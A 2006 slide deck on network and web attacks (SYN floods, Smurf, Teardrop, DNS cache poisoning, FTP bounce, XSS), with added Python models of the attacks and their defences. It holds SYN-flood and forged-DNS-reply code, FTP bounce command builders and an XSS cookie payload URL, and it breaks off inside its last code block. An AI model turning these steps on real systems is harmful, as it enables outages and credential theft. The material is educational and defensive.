
Network and Application Attacks

This guide gives an overview of network and application attacks: denial of service (single-source and distributed), fragmentation, spoofing, DNS, sniffing and FTP bounce attacks, and web application attacks. Written by Chandra Prakash Suryawanshi.



  1. Network and Application Attacks Contributed by- Chandra Prakash Suryawanshi CISSP, CEH, SANS-GSEC, CISA, ISO 27001LI, BS 25999LA, ERM (ISB) June 2006

  2. Contents • Denial of Service Attacks • Single Source • Distributed • Fragmentation Attacks • Spoofing Attacks • DNS Attacks • Sniffing Attacks • FTP Bounce Attack • Application Attacks

  3. Single Source Denial of Service Attacks

  4. Denial of Service Attacks • TCP SYN Flooding (SYN Attack) • ICMP Echo Flooding (Ping Attack) • ICMP Echo Flooding via directed broadcast (Smurf Attack) • UDP Echo Flooding (Fraggle) • Oversized ICMP Echo Request (Ping of Death) • Distributed Denial of Service • Trinoo • Tribe Flood Network (TFN)

  5. SYN Attack

  6. Three-way connection (TCP connection establishment; client on the left, server on the right)
  • Segment 1, client to server: SYN=1 ACK=0, seq 141521, win 4096, <mss 1024>
  • Segment 2, server to client: SYN=1 ACK=1, seq 181521, ack 141522, win 4096, <mss 1024>
  • Segment 3, client to server: SYN=0 ACK=1, ack 181522
  • Segment 1 shows the client sending a SYN segment with an Initial Sequence Number of 141521. The ISN is randomly generated. This is called an Active Open. The field win 4096 is the advertised window size of the sending station; the option <mss 1024> is the maximum segment size the sender is willing to receive. SYN=1, ACK=0.
  • Segment 2 shows the server responding with its own ISN, 181521, and acknowledging the client's ISN with ISN + 1 (141522). The server side is the Passive Open: it was already listening when the SYN arrived, and from this point it holds state for a half-open connection. SYN=1, ACK=1.
  • Segment 3 shows the client acknowledging the server's ISN with ISN + 1 (181522). SYN=0, ACK=1.
  • Data can now be transmitted.

  7. TCP SYN Flooding
  Attack method
  • The target keeps every half-open connection (SYN received, SYN-ACK sent, final ACK not yet received) in a backlog queue of limited size; in the stacks of the period the queue held on the order of 8-16 entries per listening port.
  • The hacker sends a stream of SYN segments (about 120 per second in the example), each with a different, unreachable spoofed source address: SYN=1 ACK=0 seq 141521, then 141686, then 141721, and so on.
  • The target answers each with a SYN-ACK (seq 181521, ack 141522 / 141687 / 141723 ...) sent to an address that never replies, so each queue entry sits there until its time-out expires.
  • Once the queue is full, the SYN from the legitimate client is dropped: denial of any TCP-based service on that port.
  Countermeasure
  • Enlarge the backlog queue and shorten the half-open time-out (this only buys time), filter spoofed source addresses at the border, and use SYN cookies, which let the server answer a SYN without keeping any state until the final ACK arrives.
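The handshake of slide 6 and the flood of slide 7, as a runnable model. This is an added example, not code from the slides: the addresses, the backlog of 8, the unreachable 10.99.x.y sources and the HMAC secret are constructed, and the ISN 141521 is taken from the slide (a real stack randomises it). The cookie scheme is a simplified version of the one RFC 4987 describes: the server's ISN is an HMAC over the connection 4-tuple, so the final ACK can be checked without a queue entry.

```python
"""Model of the TCP handshake from slide 6 and the SYN flood from slide 7.
Added example (not from the slides): addresses, the backlog size of 8 and the
secret key are constructed; a real stack randomises its ISN."""
import hashlib
import hmac
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool
    ack: bool
    seq: int       # sequence number (the ISN on a SYN)
    ack_num: int   # acknowledgement number (peer's ISN + 1)


class Listener:
    """TCP listener. backlog = half-open connections the queue can hold;
    syn_cookies=True keeps no state for a SYN until the final ACK arrives."""

    def __init__(self, ip, port, backlog=8, syn_cookies=False):
        self.ip, self.port = ip, port
        self.backlog, self.syn_cookies = backlog, syn_cookies
        self.half_open = {}      # (client ip, client port) -> server ISN
        self.established = set()
        self.secret = b"constructed per-boot secret"   # assumption

    def _cookie(self, seg):
        # SYN cookie: the ISN is an HMAC over the 4-tuple, so the final ACK
        # can be verified without a queue entry (simplified from RFC 4987)
        msg = f"{seg.src}:{seg.sport}>{self.ip}:{self.port}".encode()
        mac = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def receive(self, seg):
        key = (seg.src, seg.sport)
        if seg.syn and not seg.ack:                      # segment 1: SYN
            if self.syn_cookies:
                isn = self._cookie(seg)
            else:
                if len(self.half_open) >= self.backlog:
                    return None                          # queue full: SYN dropped
                isn = random.getrandbits(32)
                self.half_open[key] = isn
            return Segment(self.ip, self.port, seg.src, seg.sport, True, True,
                           isn, (seg.seq + 1) & 0xFFFFFFFF)   # segment 2: SYN-ACK
        if seg.ack and not seg.syn:                      # segment 3: ACK
            expected = self._cookie(seg) if self.syn_cookies else self.half_open.get(key)
            if expected is not None and seg.ack_num == (expected + 1) & 0xFFFFFFFF:
                self.half_open.pop(key, None)
                self.established.add(key)
                return "ESTABLISHED"
        return None


def client_connect(server, ip, sport, isn=141521):
    """Active open: the three segments of slide 6, with the ISN from the slide."""
    syn = Segment(ip, sport, server.ip, server.port, True, False, isn, 0)
    synack = server.receive(syn)
    if synack is None:
        return "DENIED"                              # no SYN-ACK: no service
    assert synack.syn and synack.ack and synack.ack_num == isn + 1
    ack = Segment(ip, sport, server.ip, server.port, False, True,
                  isn + 1, (synack.seq + 1) & 0xFFFFFFFF)
    return server.receive(ack)


def syn_flood(server, count):
    """Each SYN carries a different unreachable (constructed) source address, so
    the SYN-ACK is never answered and the queue entry is never released."""
    for i in range(count):
        src = f"10.99.{i // 256}.{i % 256}"
        server.receive(Segment(src, 40000 + i, server.ip, server.port,
                               True, False, random.getrandbits(32), 0))


def demo(syn_cookies, flood_size=120):
    """Flood first (the slide's ~120 SYN/s), then try a legitimate connection."""
    srv = Listener("192.0.2.80", 80, backlog=8, syn_cookies=syn_cookies)
    syn_flood(srv, flood_size)
    return client_connect(srv, "192.0.2.10", 4141)
```

demo(False) returns "DENIED": the eight queue slots are held by half-open entries that will never complete. demo(True) returns "ESTABLISHED": with cookies the flood costs the server nothing but the SYN-ACKs it sends.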

  8. PING Attack

  9. ICMP Echo Flooding (Ping Attack)
  • The hacker sends a stream of ICMP Echo Requests to the target, expecting an ICMP Echo Reply for each one.
  • Because the hacker has more bandwidth (a T-1 link in the figure) than the target (a 128K link), he can send more requests than the target's link can carry, and the replies double the load.
  Countermeasures
  • None at the target itself: once its link is saturated, dropping packets locally changes nothing. The flood has to be rate-limited or dropped upstream, at the border router or by the provider.

  10. SMURF Attack

  11. ICMP Echo Flooding (Smurf Attack)
  • The hacker sends an ICMP Echo Request to the broadcast address of an intermediary network with the source address spoofed to be the target.
  • The network serves as a "bounce site": every station on it returns an Echo Reply to the target.
  • The network multiplies the effect of the single ping; the Echo Request can be sent to many such networks at once.
  Countermeasures
  • Disable IP-directed broadcasts at your router (no ip directed-broadcast on Cisco IOS), so that you are not a bounce site.
  • Configure workstations not to respond to ICMP Echo sent to a broadcast address.
  • Filter spoofed source addresses at your border, so that your hosts cannot be used to launch it.

  12. DoS: LAND attack • A LAND attack sends a crafted SYN packet whose source IP address and port are the same as the destination IP address and port. Some TCP/IP implementations then answer themselves, allocate excessive resources, slow down and eventually hang or reboot.

  13. Ping O' Death Attack

  14. ICMP Echo Request Attack (Ping o' Death)
  • ICMP, an integral part of IP, is used to report network errors.
  • PING (Packet InterNet Groper) uses ICMP Echo and Echo Reply packets to test host reachability.
  • A ping normally consists of the IP header, the 8-byte ICMP header and a small payload (56 bytes by default, 64 with the ICMP header).
  • The IP Total Length field is 16 bits, so a datagram can be at most 65,535 bytes. The hacker sends an Echo Request whose fragments reassemble to more than that; a stack that does not check the reassembled size overflows its buffer and crashes or reboots.
  • A newer variant sets the header length fields to claim more data than the packet actually carries.
  Countermeasures
  • Patch the IP stack (and router firmware) so that reassembly rejects a datagram longer than 65,535 bytes.
  • Blocking PING (ICMP Echo) at the firewall stops the attack from outside, but also removes a useful diagnostic.
  (Figure: hacker on a T-1 link sends packets > 65,535 bytes across the Internet to a target on a 128K link.)

  15. Other DoS Attacks

  16. Other DoS Attacks • Papasmurf: a combination of Smurf and Fraggle (ICMP and UDP echo amplification). • Land: a spoofed packet where Source IP = Destination IP and Source Port = Destination Port. • Latierra: a Land relative that sends multiple Land packets to multiple ports. • Jolt2: a stream of packet fragments none of which has an offset of zero, so reassembly never completes and the target burns CPU and memory holding them. • WinNuke: sends out-of-band (URG) data to port 139 (NetBIOS) on the victim's machine, which crashed unpatched Windows 95/NT.

  17. Distributed Denial of Service Attacks - DDoS -

  18. General • A DoS attack is designed to bring down a network or a computer by overloading it with large amounts of TCP, UDP or ICMP traffic. • Past attacks came from a single source and were relatively easy to detect and filter. • Current attacks use distributed tools such as Trinoo and TFN. • Distributed DoS tools launch simultaneous attacks from many compromised systems at one or more targets. • Almost impossible to trace to the source: the agents are victims themselves, and the flood packets are usually spoofed.

  19. Common DDoS Types
  • Trinoo/WinTrinoo
  • One of the earliest DDoS tools (1999).
  • Launches a UDP flood.
  • Master and agents communicate over unencrypted TCP/UDP.
  • Root access is not needed on the agent to launch the flood.
  • Tribe Flood Network (TFN) / TFN2K
  • Employs Smurf, UDP, ICMP and TCP SYN floods.
  • Master and agents communicate with ICMP Echo Reply packets.
  • Commands are carried in the ICMP ID field.
  • The agent is silent and does not reply to the master; the master sends each command to the agent several times.
  • Root or Administrator privileges are required on the agent host (the floods need raw sockets).

  20. Fragmentation Attacks • Teardrop Attack • Fragment Overflow Attack

  21. TearDrop Attack

  22. Teardrop Attack • The Teardrop attack sends two overlapping IP fragments, the second lying entirely inside the first. The reassembly code computes a negative length for the overlap, copies far more memory than it should and crashes the kernel. • Many TCP/IP implementations of the time could not handle this behaviour.

  23. Teardrop Attack: packet layout (figure)
  • IPv4 header (bit positions 0, 15, 16, 31 across the top): VERS (4 bits), HLEN (4 bits), TOS (8 bits), Total Length (16 bits); Identification (16 bits), Flags (3 bits), Fragment Offset (13 bits); TTL (8 bits), Protocol (8 bits, 17 = UDP), Header Checksum (16 bits); Source IP Address (32 bits); Destination IP Address (32 bits); IP Options, if any (32-bit words).
  • UDP header: Source Port 53, Destination Port 53, UDP Message Length, UDP Checksum; then Data.
  • Ethernet frame: Preamble (8 bytes), Destination Address (6), Source Address (6), Type (2), Data (the IP header, UDP header and data), FCS (4).

  24. Teardrop Attack Concept (figure: hacker to target across networks with MTU 1500, 512 and 1500; IPv4 header fields as on the previous slide, 20-byte header plus up to 40 bytes of options, 60 bytes in all; the target's reassembly buffer receives Fragment 1 and then Fragment 2)
  • Fragment 1: Total Length 512, ID 26313, DF 0, MF 1, Offset 0 (512 bytes).
  • Fragment 2: Total Length 32, ID 26313, DF 0, MF 0, Offset 1, i.e. 8 bytes into the datagram (32 bytes), so it ends well inside Fragment 1.
  • This attack takes advantage of a bug in the IP fragment reassembly code: the code checks for a fragment that would run past the end of the datagram, but not for one that ends before the end of the data already received, which yields a negative length. The attack was directed at Windows NT, Windows 95 and Linux boxes.
  • Encapsulate a UDP packet inside an IP packet.
  • Spoof the source IP address and port.
  • Create two specially constructed IP fragments: the first has Offset = 0, MF = 1 and size N; the second has Offset < N, MF = 0 and size < N, so that it lies inside the first.
  • NT/Win 95 could normally withstand 5-10 such pairs before crashing or rebooting.
  • Fixes have been posted by Microsoft.

  25. Fragmentation Overflow Attack

  26. Fragment Overflow Attack (figure: IPv4 header with the Flags bits D and M and the 13-bit Fragment Offset; other fields as on the earlier slide)
  Attack method
  • The Total Length field is 16 bits, so a datagram can be at most 65,535 bytes, 65,515 of them data after a 20-byte header.
  • Intermediate routers can fragment the datagram according to the MTU of the next network.
  • MF = 0 marks the last fragment.
  • If the receiving station never gets a last fragment, it keeps the partial datagram buffered; fed a stream of such incomplete datagrams, a stack that does not bound this memory exhausts it and crashes.
  Countermeasures
  • The receiver cannot distinguish an incomplete datagram from a slow one, so the defence is to bound the cost rather than to detect the attack: a reassembly time-out that discards stale partial datagrams, and a cap on the memory reserved for reassembly.
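One reassembler that applies the three checks the fragmentation slides call for: the reassembled-size check against Ping o' Death (slide 14), the overlap check against Teardrop (slides 22-24), and the time-out and buffer cap against fragment overflow (slide 26). This is an added example, not code from the slides. The fragment sizes are constructed: the Teardrop pair keeps the slide's ID 26313 and offsets, but the first fragment carries 488 data bytes rather than the slide's 512 total so that it is a legal MF fragment (a multiple of 8 bytes).

```python
"""IPv4 fragment builder, parser and bounded reassembler with the checks that
stop Ping o' Death, Teardrop and fragment overflow. Added example, not code
from the slides; the fragments used below are constructed."""
import socket
import struct

IP_HDR = struct.Struct("!BBHHHBBH4s4s")   # 20-byte header, no options
MAX_DATAGRAM = 65535                        # 16-bit Total Length field


def build_fragment(src, dst, ident, offset_units, more, payload, proto=17):
    """offset_units is the 13-bit Fragment Offset (8-byte units); proto 17 = UDP."""
    flags_frag = (0x2000 if more else 0) | (offset_units & 0x1FFF)
    hdr = IP_HDR.pack(0x45, 0, IP_HDR.size + len(payload), ident, flags_frag,
                      64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload


def parse_fragment(pkt):
    v_ihl, _tos, total_len, ident, flags_frag, _ttl, proto, _csum, src, dst = IP_HDR.unpack_from(pkt)
    ihl = (v_ihl & 0x0F) * 4
    return {"id": ident, "proto": proto, "mf": bool(flags_frag & 0x2000),
            "offset": (flags_frag & 0x1FFF) * 8, "data_len": total_len - ihl,
            "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst)}


def check_fragment(frag, seen):
    """None if the fragment may be queued, else the attack pattern it matches."""
    start, end = frag["offset"], frag["offset"] + frag["data_len"]
    if end > MAX_DATAGRAM:
        return "ping-of-death"         # reassembled datagram would exceed 65,535 bytes
    for prev in seen:
        p_start, p_end = prev["offset"], prev["offset"] + prev["data_len"]
        if start < p_end and p_start < end:
            return "teardrop"          # overlaps data already received
    return None


class Reassembler:
    """Bounded reassembly: a time-out and a buffer cap defeat fragment overflow."""

    def __init__(self, timeout=30.0, max_buffers=64):
        self.timeout, self.max_buffers = timeout, max_buffers
        self.buffers = {}   # (src, dst, id) -> {"frags": [...], "first_seen": t}

    def add(self, pkt, now):
        self.expire(now)
        frag = parse_fragment(pkt)
        key = (frag["src"], frag["dst"], frag["id"])
        buf = self.buffers.get(key)
        if buf is None:
            if len(self.buffers) >= self.max_buffers:
                return "buffer-limit"   # refuse rather than grow without bound
            buf = self.buffers[key] = {"frags": [], "first_seen": now}
        verdict = check_fragment(frag, buf["frags"])
        if verdict:
            del self.buffers[key]       # drop the whole datagram, not just this piece
            return verdict
        buf["frags"].append(frag)
        if self._complete(buf["frags"]):
            del self.buffers[key]
            return "complete"
        return "pending"

    def expire(self, now):
        stale = [k for k, b in self.buffers.items() if now - b["first_seen"] > self.timeout]
        for k in stale:
            del self.buffers[k]         # last fragment never came: free the buffer

    @staticmethod
    def _complete(frags):
        pos, last_seen = 0, False
        for f in sorted(frags, key=lambda f: f["offset"]):
            if f["offset"] != pos:
                return False            # gap: a fragment is still missing
            pos += f["data_len"]
            last_seen = not f["mf"]
        return last_seen                # the MF=0 fragment is in place
```

The Teardrop pair (offset 0 with 488 bytes, then offset 1 with 12 bytes) is rejected on the second fragment; a single fragment at offset 8189 with 1480 bytes is rejected outright because 65512 + 1480 exceeds 65,535; a flood of never-completed datagrams is answered with "buffer-limit" once the cap is reached and the stale buffers are freed after the time-out.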

  27. Spoofing Attacks

  28. Spoofing Attacks • IP Spoof. • TCP Sequence Attack. • ARP Spoof. • ICMP Spoof. • RIP Spoof.

  29. IP Spoof Attack • The IP spoofing attack is really a trust-relationship exploitation: a trusted relationship that requires only IP-address-based authentication (rlogin/rsh with .rhosts, for example). • The attack has several components: • Identify a target host. • Identify a host that the target trusts. • Execute a denial of service attack against the trusted host (e.g. a TCP SYN attack), so that it cannot reset the forged connection. • Sample the target's TCP sequence numbers and predict the ISN it will use next. • Impersonate the trusted host and open a connection to a service that requires only address-based authentication, completing the handshake blind with the predicted ISN.

  30. IP Spoofing (figure: Hacker on the Internet, Screening Router, internal network 181.10.10.0 with hosts 181.10.10.2 and 181.10.10.3, and internal network 181.10.13.0 with trusted host 181.10.13.1)
  1. The hacker assumes source address 181.10.13.1 in order to fool the screening router by appearing to reside on the internal network (a trusted host). The packet reads From: 181.10.13.1 To: 181.10.10.2.
  2. The screening router is fooled into believing that this packet comes from an internal address. The packet REALLY comes from the hacker; it only APPEARS to come from 181.10.13.1.
  Countermeasure • This attack is defeated by filtering on both sides of the firewall or screening router: drop packets arriving from the Internet whose source address is internal (ingress filtering), and drop packets leaving whose source address is not one of yours (egress filtering, RFC 2827), so that your network cannot be used to launch the same attack on others.

  31. DNS Attacks

  32. DNS Attacks • DNS Cache Poisoning

  33. DNS Attacks: Background (figure: Host.Target.Com and DNS.Server.Com on one side of the Internet, DNS.Bad.Com and Hacker.Bad.Com on the other)
  1. The DNS server:
  • Translates hostnames into IP addresses.
  • Translates IP addresses into hostnames.
  • Provides host information, etc.
  2. There are three main categories of DNS server:
  • Primary: there is only one primary server for each domain; all domain data derives from it. It is loaded by the domain administrator and is authoritative.
  • Secondary: there can be more than one secondary server per domain; it acts as a backup to the primary. The domain database is copied from the primary by zone transfer on a scheduled basis.
  • Cache-only: these servers obtain their information from other name servers and cache it. They are non-authoritative.

  34. DNS Attacks: Background (continued)
  3. A BIND-style DNS server maintains the following files:
  • named.hosts: the zone file that maps host names to IP addresses.
  • named.rev: the reverse zone file that maps IP addresses to host names.
  • named.ca: addresses of the root domain servers.
  • named.local: the loopback address, 127.0.0.1.
  • named.boot: the named parameters; points to the source of each zone's data.
  4. The local DNS server maintains a cache of its recent answers.
  • It consults the cache first to see if it already knows the answer.
  • If not, it forwards the query to other DNS servers.
  • On receiving the answer it stores it in the cache and forwards the response to the client.
  Possible attacks:
  • Poison the DNS cache.
  • Poison the name server (its zone data).
  • Imitate the name server.

  35. Attack 1: DNS Cache Poisoning, the seed (figure: (1) Hacker.Bad.Com asks DNS.Server.Com "What is the IP address of Unknown.Bad.Com?"; (2) DNS.Server.Com asks DNS.Bad.Com; (3) Hacker.Bad.Com asks DNS.Server.Com "What is the IP address of www.anyone.com?"; (4) the spoofed reply "The IP address of www.anyone.com is 127.0.0.1!")
  1. Hacker.bad.com sends a recursive query to DNS.server.com asking for the IP address of unknown.bad.com.
  2. DNS.server.com is not authoritative for that domain, so it queries DNS.bad.com.
  • The hacker controls DNS.bad.com and observes this query to learn the transaction ID (and source port) the resolver is using.
  • The hacker needs this ID because the resolver accepts a reply only if its ID matches the outstanding query; with sequential IDs the next one is predictable.
  3. Hacker.bad.com submits a query to DNS.server.com for the address of www.anyone.com.
  4. The hacker immediately spoofs a reply, as if from anyone.com's name server, saying www.anyone.com = 127.0.0.1.
  • This seeds the DNS server's cache.
  • The IP address could be any address the hacker chooses. Resolvers that randomise both the transaction ID and the UDP source port of every query make the guess impractical, which is why that became the standard fix.

  36. Attack 1: DNS Cache Poisoning, the spoof (figure: Host.Target.Com asks "What is the IP address of www.anyone.com?" and DNS.Server.Com answers "The IP address of www.anyone.com is 127.0.0.1!")
  1. Host.target.com sends a query to DNS.server.com because it wants to connect to www.anyone.com.
  2. DNS.server.com responds with the address from its poisoned cache, and keeps doing so for every client until the bogus record's TTL expires.
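The exchange of slides 35 and 36 as a runnable model: a caching resolver that accepts the first reply matching its outstanding query, an attacker who learns one transaction ID by operating DNS.Bad.Com, and the forged answer for www.anyone.com. This is an added example, not code from the slides; the server addresses, the ID sequences and the "real" answer are constructed. The slides mention only the query ID; the source-port check in the model is the later hardening, and the generators let you switch between the weak (sequential ID, fixed port) and the hardened (random ID and port) behaviour.

```python
"""Slides 35-36 as a model: transaction-ID matching, an observed ID, a spoofed
reply. Added example, not code from the slides; addresses are constructed."""
import itertools
import random
from dataclasses import dataclass

DNS_BAD_COM = "203.0.113.53"       # attacker-run authoritative server (constructed)
DNS_ANYONE_COM = "198.51.100.53"   # genuine authoritative server for anyone.com (constructed)
REAL_ANSWER = "198.51.100.7"


@dataclass
class Query:
    txid: int
    name: str
    src_port: int


@dataclass
class Response:
    txid: int
    name: str       # question section echoed back
    answer: str     # address in the answer section
    dst_port: int   # port the reply is sent to
    from_ip: str    # source address of the reply (the attacker spoofs it)


class Resolver:
    """id_gen / port_gen supply the transaction ID and UDP source port per query."""

    def __init__(self, id_gen, port_gen):
        self.id_gen, self.port_gen = id_gen, port_gen
        self.cache = {}
        self.pending = {}   # txid -> (Query, upstream ip)

    def ask_upstream(self, name, upstream_ip):
        q = Query(self.id_gen() & 0xFFFF, name, self.port_gen())
        self.pending[q.txid] = (q, upstream_ip)
        return q

    def receive(self, r):
        entry = self.pending.get(r.txid)
        if entry is None:
            return "dropped: unknown txid"
        q, upstream_ip = entry
        if r.dst_port != q.src_port or r.name != q.name or r.from_ip != upstream_ip:
            return "dropped: mismatch"
        del self.pending[r.txid]
        self.cache[r.name] = r.answer       # first matching reply wins
        return "cached"


def run_attack(id_gen, port_gen, guesses=1):
    """Returns what DNS.Server.Com ends up caching for www.anyone.com."""
    res = Resolver(id_gen, port_gen)
    # (1)-(2) hacker.bad.com asks for unknown.bad.com; the resolver recurses to
    # DNS.Bad.Com, which the attacker runs, so the attacker sees txid and port.
    seed = res.ask_upstream("unknown.bad.com", DNS_BAD_COM)
    res.receive(Response(seed.txid, "unknown.bad.com", "203.0.113.9", seed.src_port, DNS_BAD_COM))
    # (3) hacker.bad.com asks for www.anyone.com; the resolver recurses to the real server
    target = res.ask_upstream("www.anyone.com", DNS_ANYONE_COM)
    # (4) the attacker at once spoofs replies "from" DNS.Anyone.Com, guessing that
    # the next txid follows the observed one and that the port is unchanged
    for guess in range(seed.txid + 1, seed.txid + 1 + guesses):
        forged = Response(guess & 0xFFFF, "www.anyone.com", "127.0.0.1", seed.src_port, DNS_ANYONE_COM)
        if res.receive(forged) == "cached":
            break
    # the genuine answer arrives later and is ignored if the cache is already seeded
    res.receive(Response(target.txid, "www.anyone.com", REAL_ANSWER, target.src_port, DNS_ANYONE_COM))
    return res.cache["www.anyone.com"]


def sequential_ids(start):
    counter = itertools.count(start)
    return lambda: next(counter)


def fixed_port(port):
    return lambda: port


def random_ids(rng):
    return lambda: rng.randrange(1 << 16)


def random_ports(rng):
    return lambda: rng.randrange(1024, 1 << 16)
```

run_attack(sequential_ids(0x1234), fixed_port(53)) returns "127.0.0.1": one observed ID is enough. With random_ids(random.Random()) and random_ports(random.Random()) a single forged reply must hit both a 16-bit ID and a 16-bit port, so the genuine answer wins.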

  37. Sniffer Attack

  38. Sniffer Attack
  Concept
  • On a shared Ethernet every frame reaches every station; a network card normally passes up only frames addressed to its own physical address.
  • The hacker runs a sniffer on the LAN in promiscuous mode, accepting every frame, to look for:
  • Unencrypted passwords
  • Encrypted passwords (for offline cracking or replay)
  • Private data
  • Financial information (account numbers)
  • Low-level protocol information
  • A sniffer attack is normally a prelude to other attacks.
  Action
  • Host A telnets to Host B, sending its user name and password in the clear.
  • The hacker records the password for later use.
  Countermeasures
  • Segment the LANs (switches rather than hubs), so that the hacker's port does not see other hosts' traffic.
  • Replace clear-text protocols such as Telnet with encrypted ones such as SSH.
  • Use one-time or challenge-response authentication (tokens, smart cards), so that a captured credential cannot be replayed.

  39. FTP Bounce Attack

  40. FTP Connection Example
  Normal (active) FTP connection
  1. The client opens an FTP command channel from port 4140 to the server (port 21) and tells the server its data port number with PORT (IP address, 4141).
  2. The server acknowledges the request ("OK").
  3. The server opens the data channel from its port 20 to the client's data port (4141).
  4. The client acknowledges this connection ("OK").
  The attack concept
  1. The PORT command has the form n1,n2,n3,n4,n5,n6.
  2. It names the client IP address (n1.n2.n3.n4) and port (n5 × 256 + n6), and nothing in the protocol requires that address to be the client's own.

  41. FTP Connection Example (continued)
  Normal (active) FTP connection
  • The client opens an FTP command channel from port 4140 to the server (port 21) and tells the server its data port number ("PORT 4141").
  • The server acknowledges the request ("OK").
  • The server opens the data channel from its port 20 to the client's data port (4141).
  • The client acknowledges this connection ("OK").
  Passive FTP connection
  • The client opens an FTP command channel to the server (port 21) and requests passive mode ("PASV").
  • The server acknowledges passive mode and allocates port 2266 as the data channel ("OK 2266").
  • The client opens the data channel from its data port (4141) to the server's data port (2266).
  • The server acknowledges the data connection ("OK").

  42. FTP Bounce Attack Concept (figure: Hacker Server, Bounce Server and Target Server)
  • The hacker cannot reach the Target Server directly.
  • The Target Server does accept connections from the Bounce Server.
  • The Bounce Server offers anonymous FTP with a world-writable directory available to incoming connections.
  • The hacker can put her own FTP server into passive mode, so that it will accept the data connection that delivers the stolen file.

  43. FTP Bounce Attack, Phase 1 (on the Hacker Server)
  • The hacker opens an FTP connection to her own server.
  • She changes to a writable directory and issues a "PASV" command followed by a "STOR" command.
  • She notes the IP address and port (H,H,H,H,P,P) returned by "PASV": that is where the Target's data will be delivered.
  • She constructs a file called "retrvit" containing a series of FTP commands that will:
  • sign on to the Target Server,
  • change to the directory of the desired file,
  • use the FTP PORT command to specify the IP address and port (H,H,H,H,P,P) of the Hacker Server, and
  • retrieve the file.

  44. FTP Bounce Attack, Phase 2 (on the Bounce Server)
  • She opens an FTP command connection to the Bounce Server, logs in anonymously and changes to the world-writable incoming directory.
  • She then: • transfers the file "retrvit" to the Bounce Server, • issues a PORT command naming the Target Server's address and port 21, and • issues "RETR retrvit".
  • The Bounce Server opens a data connection to the Target Server's command port and sends it the contents of "retrvit", which the Target reads as FTP commands.
  • Those commands log in to the Target, open a data connection to the IP address and port (H,H,H,H,P,P) of the Hacker Server, and download the desired files to it. The Target's logs show only the Bounce Server.
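The address encoding of slides 40-41 and the two phases of the bounce (slides 42-44), as an added example that is not code from the slides. The host names, credentials and file name are constructed ("retrvit" is the command-file name the slides use); the three functions at the end show what the hacker types on each machine and the check a bounce server should make before honouring PORT.

```python
"""PORT/PASV address encoding and the FTP bounce from slides 40-44.
Added example, not from the slides; hosts, credentials and paths are constructed."""
import re

PASV_RE = re.compile(r"227\b.*?\((\d+,\d+,\d+,\d+,\d+,\d+)\)")


def encode_hostport(ip, port):
    """h1,h2,h3,h4,p1,p2 with port = p1*256 + p2 (used by PORT and in the 227 reply)."""
    octets = ip.split(".")
    if len(octets) != 4 or not 0 <= port <= 65535:
        raise ValueError("bad address or port")
    return ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def decode_hostport(args):
    parts = [int(x) for x in args.split(",")]
    if len(parts) != 6 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError("malformed h1,h2,h3,h4,p1,p2")
    return ".".join(map(str, parts[:4])), parts[4] * 256 + parts[5]


def parse_pasv_reply(line):
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> (ip, port)."""
    m = PASV_RE.search(line)
    if not m:
        raise ValueError("not a 227 reply")
    return decode_hostport(m.group(1))


def retrvit_contents(user, password, path, hacker_ip, hacker_port):
    """Phase 1: the command file. When the Target reads it on its port 21 it logs
    in, sends the file to the hacker's PASV port, and quits."""
    lines = [f"USER {user}", f"PASS {password}",
             f"PORT {encode_hostport(hacker_ip, hacker_port)}", f"RETR {path}", "QUIT"]
    return "\r\n".join(lines) + "\r\n"


def bounce_commands(target_ip):
    """Phase 2: what the hacker types on the Bounce Server after uploading retrvit.
    PORT aims the data connection at the Target's command port; RETR then makes
    the Bounce Server deliver the file's bytes there, where they are read as commands."""
    return [f"PORT {encode_hostport(target_ip, 21)}", "RETR retrvit"]


def server_accepts_port(control_peer_ip, args):
    """Countermeasure on the Bounce Server: honour PORT only toward the client that
    opened the control connection, and never toward a privileged port."""
    ip, port = decode_hostport(args)
    return ip == control_peer_ip and port >= 1024
```

With the slide's numbers, "181,10,10,2,16,45" decodes to port 4141 (16 × 256 + 45) and the passive reply "(181,10,10,3,8,218)" to port 2266. The bounce command "PORT 192,0,2,7,0,21" fails server_accepts_port twice over: the address is not the control peer's and the port is privileged.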

  45. Web Attacks • Cross-Site Scripting • SQL Injection • Directory Traversal • Command Injection • Malicious Code Execution

  46. Cross-Site Scripting • Cross-site scripting attacks place malicious code where other users will see it. The intention is to steal cookies that identify a user's session, or to trick users into supplying their credentials to the attacker. • Many web sites use cookies to keep track of users. A cookie typically carries a session identifier that stands in for the user's login; whoever holds it is treated as that user. A hacker steals cookies in order to use someone else's identity. • When someone browses to a page, the browser sends the site's cookies along with the HTTP request. The cookie lives in the browser, for the session or until its expiry date, so it is the browser that has to be tricked into giving it up.

  47. XSS • Many web sites contain forms for posting information such as names and addresses, or comments on bulletin boards. The hacker injects scripting code into a vulnerable page through such a form. • Scripting code includes tags such as <SCRIPT>. When another user views the page, the script runs in that user's browser and can send the user's cookies to another location, such as another web site (hence the name: Cross-Site Scripting), where the hacker can collect them. These cookies might contain the login session.

  48. XSS • Another variety of cross-site scripting does not steal cookies but dupes the victim into supplying his or her credentials. The attacker enters scripting code into a form; when a user views the stored content, the script shows a pop-up form asking the victim for his or her details, and that form sends them to the attacker. • Instead of targeting holes in your server's operating system or web server software, the attack works directly against the users of your site. It does this by getting script (JavaScript, JScript, etc.) into a dynamic page of the targeted web site, through a form field or a URL parameter. If the web site does not check or encode this input, it passes it verbatim back to users' browsers, where it runs with the site's own origin and can cause all kinds of damage.

  49. XSS • Consider the following URL: http://www.example.com/search.pl?text=<script>alert(document.cookie)</script> • If an attacker can get us to follow a link like this and the web application echoes the text parameter without encoding it, our browser pops up an alert showing our current set of cookies for that site. This particular example is harmless; an attacker can do much more, including stealing session cookies, resetting your home page or redirecting you to another web site.
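The search.pl URL from slide 49 run through a reflecting handler, first as the slide describes it and then with output encoding. This is an added example, not code from the slides; the page template, the cookie-exfiltration payload and the cookie name are constructed. It also shows the HttpOnly cookie attribute, which limits what a script that does run can read, so that the "steal cookies" part of slides 46-47 fails even where the reflection is not fixed.

```python
"""Slide 49's URL through a reflecting handler, vulnerable and hardened.
Added example, not from the slides; template and payloads are constructed."""
import html
from urllib.parse import parse_qs, urlsplit

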